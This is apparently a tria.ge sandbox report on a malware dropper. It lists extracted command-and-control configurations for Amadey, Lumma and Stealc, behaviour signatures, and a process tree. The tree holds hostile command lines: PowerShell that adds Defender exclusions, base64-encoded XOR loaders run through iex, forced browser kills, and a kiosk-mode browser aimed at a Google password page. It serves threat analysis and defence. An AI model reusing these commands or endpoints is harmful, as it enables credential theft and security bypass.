Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    125s
  • max time network
    155s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    07/03/2025, 16:07

General

  • Target

    3257a90914b6dfdb338969b2a58a260a.exe

  • Size

    5.5MB

  • MD5

    3257a90914b6dfdb338969b2a58a260a

  • SHA1

    8760b6b9e7412e1346b5427a0e92e7399d226561

  • SHA256

    8b91be73c8fdc9e0d3f9771945bd8d6cead01382bf4b9c68fd056047c7249b8f

  • SHA512

    a7bfee3fc1c5b1a7a107a2fd80ec8474ec05adbf4f5557dafd820699690baf266ebc0dd53abd278d98950f746438dd9f96a2ee2bf29c3a68cf048daec61a6258

  • SSDEEP

    98304:w4HFD2LWvXJq/8y2ccr9+MXamXXbkxvWTioIqqUt0p3CkyVulQqc/ABiJk:HcSvUMccrx9XLkqIqqUSpncDFABi

Malware Config

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

C2

https://defaulemot.run/api

https://begindecafer.world/api

https://garagedrootz.top/api

https://modelshiverd.icu/api

https://arisechairedd.shop/api

https://fcatterjur.run/api

https://orangemyther.live/api

https://fostinjec.today/api

https://6sterpickced.digital/api

https://dawtastream.bet/api

https://foresctwhispers.top/api

https://tracnquilforest.life/api

https://xcollapimga.fun/api

https://strawpeasaen.fun/api

https://jquietswtreams.life/api

https://starrynsightsky.icu/api

https://earthsymphzony.today/api

https://xexarthynature.run/api

https://hardswarehub.today/api

https://gadgethgfub.icu/api

Extracted

Family

stealc

Botnet

trump

C2

http://45.93.20.28

Attributes
  • url_path

    /85a1cacf11314eb8.php

Extracted

Family

stealc

Botnet

traff1

Attributes
  • url_path

    /gtthfbsb2h.php

Extracted

Family

lumma

C2

https://exarthynature.run/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 16 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file 26 IoCs
  • Uses browser remote debugging 2 TTPs 15 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • .NET Reactor proctector 2 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks BIOS information in registry 2 TTPs 32 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 28 IoCs
  • Identifies Wine through registry keys 2 TTPs 16 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 9 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 7 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 16 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 38 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 13 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 10 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 3 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 32 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\3257a90914b6dfdb338969b2a58a260a.exe
    "C:\Users\Admin\AppData\Local\Temp\3257a90914b6dfdb338969b2a58a260a.exe"
    1⤵
    • Adds Run key to start application
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:680
    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\A7B94.exe
      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\A7B94.exe
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4992
      • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1E08u3.exe
        C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1E08u3.exe
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Checks computer location settings
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:1080
        • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
          "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Downloads MZ/PE file
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Adds Run key to start application
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Modifies registry class
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:4368
          • C:\Users\Admin\AppData\Local\Temp\10126610101\a26361a646.exe
            "C:\Users\Admin\AppData\Local\Temp\10126610101\a26361a646.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:2576
            • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
              "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
              6⤵
              • Downloads MZ/PE file
              • System Location Discovery: System Language Discovery
              PID:4872
          • C:\Users\Admin\AppData\Local\Temp\10126620101\ebcf281f33.exe
            "C:\Users\Admin\AppData\Local\Temp\10126620101\ebcf281f33.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:4836
            • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
              "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
              6⤵
              • Downloads MZ/PE file
              • System Location Discovery: System Language Discovery
              PID:3512
          • C:\Users\Admin\AppData\Local\Temp\10126630101\f2f8df5acc.exe
            "C:\Users\Admin\AppData\Local\Temp\10126630101\f2f8df5acc.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:3508
          • C:\Users\Admin\AppData\Local\Temp\10126640101\7be4314deb.exe
            "C:\Users\Admin\AppData\Local\Temp\10126640101\7be4314deb.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:856
            • C:\Users\Admin\AppData\Local\Temp\10126640101\7be4314deb.exe
              "C:\Users\Admin\AppData\Local\Temp\10126640101\7be4314deb.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:3452
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 856 -s 972
              6⤵
              • Program crash
              PID:3044
          • C:\Users\Admin\AppData\Local\Temp\10126650101\07a3928e11.exe
            "C:\Users\Admin\AppData\Local\Temp\10126650101\07a3928e11.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Downloads MZ/PE file
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:536
            • C:\Users\Admin\AppData\Local\Temp\8CKO89S7RFEHT4LV2KHUEN5.exe
              "C:\Users\Admin\AppData\Local\Temp\8CKO89S7RFEHT4LV2KHUEN5.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:1136
          • C:\Users\Admin\AppData\Local\Temp\10126660101\f266eb5780.exe
            "C:\Users\Admin\AppData\Local\Temp\10126660101\f266eb5780.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:228
          • C:\Users\Admin\AppData\Local\Temp\10126670101\9dd5ebb048.exe
            "C:\Users\Admin\AppData\Local\Temp\10126670101\9dd5ebb048.exe"
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            PID:4160
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /F /IM firefox.exe /T
              6⤵
              • System Location Discovery: System Language Discovery
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2372
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /F /IM chrome.exe /T
              6⤵
              • System Location Discovery: System Language Discovery
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2664
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /F /IM msedge.exe /T
              6⤵
              • System Location Discovery: System Language Discovery
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2460
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /F /IM opera.exe /T
              6⤵
              • System Location Discovery: System Language Discovery
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:5004
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /F /IM brave.exe /T
              6⤵
              • System Location Discovery: System Language Discovery
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:4004
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
              6⤵
                PID:4216
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                  7⤵
                  • Checks processor information in registry
                  • Modifies registry class
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of SendNotifyMessage
                  • Suspicious use of SetWindowsHookEx
                  PID:992
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2028 -parentBuildID 20240401114208 -prefsHandle 1956 -prefMapHandle 1948 -prefsLen 27276 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {2ea04936-7d02-47be-a5ca-5e8a25e972ad} 992 "\\.\pipe\gecko-crash-server-pipe.992" gpu
                    8⤵
                      PID:4964
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2476 -parentBuildID 20240401114208 -prefsHandle 2468 -prefMapHandle 2464 -prefsLen 28196 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c0ad6503-ac51-4fec-b3d5-9bfbe6c9d56e} 992 "\\.\pipe\gecko-crash-server-pipe.992" socket
                      8⤵
                        PID:2804
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3116 -childID 1 -isForBrowser -prefsHandle 2876 -prefMapHandle 3156 -prefsLen 22698 -prefMapSize 244658 -jsInitHandle 1300 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9d5b7b62-f4ff-4e7f-93f6-994d602b1041} 992 "\\.\pipe\gecko-crash-server-pipe.992" tab
                        8⤵
                          PID:4220
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3708 -childID 2 -isForBrowser -prefsHandle 3700 -prefMapHandle 3696 -prefsLen 32686 -prefMapSize 244658 -jsInitHandle 1300 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4c3d632b-4ce6-4c01-bb1b-e3835adf9ff8} 992 "\\.\pipe\gecko-crash-server-pipe.992" tab
                          8⤵
                            PID:4476
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4884 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4876 -prefMapHandle 4776 -prefsLen 32686 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {908de87b-9050-428e-8751-76fe08ace0b6} 992 "\\.\pipe\gecko-crash-server-pipe.992" utility
                            8⤵
                            • Checks processor information in registry
                            PID:6928
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5460 -childID 3 -isForBrowser -prefsHandle 4736 -prefMapHandle 4732 -prefsLen 27226 -prefMapSize 244658 -jsInitHandle 1300 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {37e3119c-5aa7-453e-b292-24319f17915e} 992 "\\.\pipe\gecko-crash-server-pipe.992" tab
                            8⤵
                              PID:5568
                            • C:\Program Files\Mozilla Firefox\firefox.exe
                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5480 -childID 4 -isForBrowser -prefsHandle 5632 -prefMapHandle 5636 -prefsLen 27226 -prefMapSize 244658 -jsInitHandle 1300 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7b1e2a7a-3959-4c27-a84a-b189cc88357a} 992 "\\.\pipe\gecko-crash-server-pipe.992" tab
                              8⤵
                                PID:5580
                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5824 -childID 5 -isForBrowser -prefsHandle 5900 -prefMapHandle 5896 -prefsLen 27226 -prefMapSize 244658 -jsInitHandle 1300 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {22634b4c-89d8-4704-ab6a-10a63fbd5ce1} 992 "\\.\pipe\gecko-crash-server-pipe.992" tab
                                8⤵
                                  PID:5592
                          • C:\Users\Admin\AppData\Local\Temp\10126680101\0876cf74dd.exe
                            "C:\Users\Admin\AppData\Local\Temp\10126680101\0876cf74dd.exe"
                            5⤵
                            • Modifies Windows Defender DisableAntiSpyware settings
                            • Modifies Windows Defender Real-time Protection settings
                            • Modifies Windows Defender TamperProtection settings
                            • Modifies Windows Defender notification settings
                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                            • Checks BIOS information in registry
                            • Executes dropped EXE
                            • Identifies Wine through registry keys
                            • Windows security modification
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • System Location Discovery: System Language Discovery
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:5996
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10126691121\skf7iF4.cmd"
                            5⤵
                            • System Location Discovery: System Language Discovery
                            PID:6648
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              powershell -windowstyle hidden -command "Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\10126691121\skf7iF4.cmd' -ArgumentList 'sgcCUaUFtA' -WindowStyle Hidden -Verb RunAs"
                              6⤵
                              • Command and Scripting Interpreter: PowerShell
                              • System Location Discovery: System Language Discovery
                              • Modifies registry class
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:6712
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10126691121\skf7iF4.cmd" sgcCUaUFtA
                                7⤵
                                • System Location Discovery: System Language Discovery
                                PID:6948
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  powershell.exe "if ((Get-WmiObject Win32_DiskDrive | Select-Object -ExpandProperty Model | findstr /i 'WDS100T2B0A') -and (-not (Get-ChildItem -Path F:\ -Recurse | Where-Object { -not $_.PSIsContainer } | Measure-Object).Count)) {exit 900} else {exit 1}"
                                  8⤵
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:6996
                                  • C:\Windows\SysWOW64\findstr.exe
                                    "C:\Windows\system32\findstr.exe" /i WDS100T2B0A
                                    9⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:4636
                          • C:\Users\Admin\AppData\Local\Temp\10126700101\PQkVDtx.exe
                            "C:\Users\Admin\AppData\Local\Temp\10126700101\PQkVDtx.exe"
                            5⤵
                            • Executes dropped EXE
                            • Drops file in Program Files directory
                            • Enumerates system info in registry
                            PID:5528
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              powershell.exe -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files\runtime'"
                              6⤵
                              • Command and Scripting Interpreter: PowerShell
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3572
                            • C:\Program Files\runtime\COM Surrogate.exe
                              "C:\Program Files\runtime\COM Surrogate.exe"
                              6⤵
                              • Executes dropped EXE
                              • Adds Run key to start application
                              PID:6384
                              • C:\Windows\system32\net.exe
                                "net" session
                                7⤵
                                  PID:4196
                                  • C:\Windows\system32\net1.exe
                                    C:\Windows\system32\net1 session
                                    8⤵
                                      PID:4032
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    "powershell" -EncodedCommand JABpAGcAdQBsAHkAaAA9ACcATQBIAFoAOABYAGwAWQB2AFkARgBrAHYARABEADgAbQBQAEgAZAA0AFQARgBZADQAYwAxAG8AWQBkAHgARQA4AEIAaQB0AGcAVwBXADgAVwBTAFYANAB6AEIAMABRAFMAQgBpAGgASwBCADEAYwBXAFoAMQBnAGUAQQBRADAAZwBCAG4AWgAvAFUAWAA4ADQAQQBHAGsAWQBkAGsAUQBrAFAAQgBJAGIAWABYAHcARQBkADAAWQBnAEIAMABRAGUAQgBnAE4AcwBUADIAOABXAGEAMABFAFoASwBTAE0AbABQAEgAZAA3AFUAWABrAFUAWgB4AGsAagBkAGcAMQBoAEIAbgBkAEMAUQBGAGMAdABjADAAVQBlAEEAeABJADMATAB6AHgASwBjAG4AbwB0AFMAWABzAFoAZABpAE0AcABCAG4AUgBXAGQARwA4AEcAQQBGADAAWQBMAFIAWQArAEwAegB4AHYAUQBtAE0AcwBaADEAUQBqAEwAVABjAEQAQQBSAEkAYgBkAEYAWQA0AGMARgBrAHMAZABoAGsAbABQAHcASQBYAEIAVwBCAHkAWQB4AGcAWQBBAHkAQQAzAE4AZwBKAEMAWABXADgARwBaADEAZwA9ACcAOwAkAG4AZgBwAHYAawB1AD0AJwBlAEUALgA2ADUAQQAxAC0AegBEAHUAUAAnADsAJAB4AHEAbgB2AGkAcwA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABpAGcAdQBsAHkAaAApADsAJAB0AHYAYwBhAGYAYwBoAHUAPQAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAKABmAG8AcgAoACQAaQA9ADAAOwAkAGkAIAAtAGwAdAAgACQAeABxAG4AdgBpAHMALgBMAGUAbgBnAHQAaAA7ACQAaQArACsAKQB7ACQAeABxAG4AdgBpAHMAWwAkAGkAXQAtAGIAeABvAHIAWwBiAHkAdABlAF0AJABuAGYAcAB2AGsAdQBbACQAaQAlACQAbgBmAHAAdgBrAHUALgBMAGUAbgBnAHQAaABdAH0AKQApACkAOwBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAdAB2AGMAYQBmAGMAaAB1ACkAKQB8AGkAZQB4AA==
                                    7⤵
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:6456
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
                                      8⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2664
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    "powershell" -EncodedCommand JABlAHIAZwBuAD0AJwBFAFUAQQAvAFUARABBAC8ARABrAEEAVQBEAEcAYwBZAEgAVQBFADcAUQBqAEEAbwBIAFUATQBqAGQAMABrAEMASgB4ADAAagBWAHcAawBHAEoAMABjAEkAQgB4AHcAcwBKAHgANABKAEMAVABFAEcAQwBVAEUAbABBAFYAVQBlAEoAMABBADgAWAB4AGsAbwBiAG4AQQBqAGQAaAB3AGEASABTAFIAWQBVAHgAbwBVAEcAVgA4AGIAQgB4AHcAZwBKAHoAVQB2AFEAUQBrAEcAQgBWAGcAaQBLAFgAcwBiAEgAVQBFADQAWAB4ADgARQBDAFEAQQBZAGQAbABWAGYASgAwAEUAQgBUAGoARQA5AEgAVgB3AGwAQQAwAG8ASgBEAGcAbwBKAGYAQgB3ADkASgAyAEkAaQBkAG4AcwBYAEoAMABJAFYAZQBnAGsAVwBiAGsAUQBqAEsARgBVAHMASgB6AHMAdgBmAFEAbwBKAEQAVgB3AFoAQQBWAFUAWQBIAFUARQByAFMAdwBzAFgASABWAHcAWQBkAGwAawBHAEgAawBFADcAUQBoAGsAbwBQAEYAbwBJAEIAeAB3ADUASABpAHMAbgBVAFIAbwBYAEYAUQBVAGoATAAyAHMAVQBEAFQAQgBjAFkARABJAEcAYQBsADgAagBkADAAawA2AEkARABzAEIAUwB3AGsAQwBIAFgAMABnAEUAMwA4AEYASABpAFIAWgBCAFEAPQA9ACcAOwAkAHEAbwBrAGwAZABwAD0AJwBEAHMAbQA4AFMAUQBfADQAQQBEAC0AbgAnADsAJAB1AGYAZABkAD0AWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGUAcgBnAG4AKQA7ACQAbQBrAGkAawBiAHMAYQByAD0AKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkACgAZgBvAHIAKAAkAGkAPQAwADsAJABpACAALQBsAHQAIAAkAHUAZgBkAGQALgBMAGUAbgBnAHQAaAA7ACQAaQArACsAKQB7ACQAdQBmAGQAZABbACQAaQBdAC0AYgB4AG8AcgBbAGIAeQB0AGUAXQAkAHEAbwBrAGwAZABwAFsAJABpACUAJABxAG8AawBsAGQAcAAuAEwAZQBuAGcAdABoAF0AfQApACkAKQA7AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABtAGsAaQBrAGIAcwBhAHIAKQApAHwAaQBlAHgA
                                    7⤵
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:6652
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Packages'
                                      8⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2292
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
